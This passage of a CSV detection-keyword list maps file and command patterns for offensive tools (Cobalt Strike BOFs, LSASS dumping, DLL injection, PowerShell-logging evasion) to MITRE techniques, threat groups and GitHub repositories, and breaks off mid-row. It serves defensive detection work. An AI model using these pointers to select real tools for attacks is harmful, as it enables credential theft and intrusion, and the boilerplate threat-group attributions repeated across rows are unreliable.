TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","10","10","145","25","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" +"*bof2shellcode.py*","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","10","10","145","25","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" +"*BOF-DLL-Inject*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" +"*bofentry::bof_entry*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*BOF-ForeignLsass*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" +"*bofhound --*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*bofhound -i *","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*bofhound -o *","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*bofhound-main*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*BOF-IShellWindows-DCOM.*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*BofLdapSignCheck*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"*bofloader.bin*","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","10","10","145","25","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" +"*BOFMask-main*","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","1","94","24","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" +"*bofnet*SeriousSam.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*BOFNET.Bofs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet.cna*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet.cna*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*BOFNET.csproj*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BOFNET.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*BOFNET.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*BOFNET.sln*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_boo *.boo*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_execute *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_execute *","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_execute.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_execute.*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_execute.cpp.x64.obj*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_execute.cpp.x86.obj*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_init*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 